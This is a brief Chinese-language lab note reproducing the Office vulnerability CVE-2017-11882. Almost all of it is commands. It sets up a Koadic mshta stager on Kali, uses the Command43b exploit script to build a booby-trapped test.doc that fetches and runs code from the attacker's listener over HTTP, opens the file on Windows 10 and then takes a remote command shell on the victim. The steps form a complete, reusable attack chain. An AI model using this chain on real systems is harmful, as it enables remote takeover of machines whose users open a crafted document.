【研究】CVE-2017-11882-Office远程代码执行漏洞复现

实验环境：win10+kali

工具：koadic，Command43b_CVE-2017-11882.py

KALI:

root@kali:/opt/koadic-master# ./koadic

(koadic: stager/js/mshta)# set lhost 10.73.28.148

(koadic: stager/js/mshta)# set lport 55555

(koadic: stager/js/mshta)# run

 python C:\Users\esafenet\Desktop\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc

win10上打开test.doc

(koadic: stager/js/mshta)# zombies 0

(koadic: stager/js/mshta)# cmdshell 0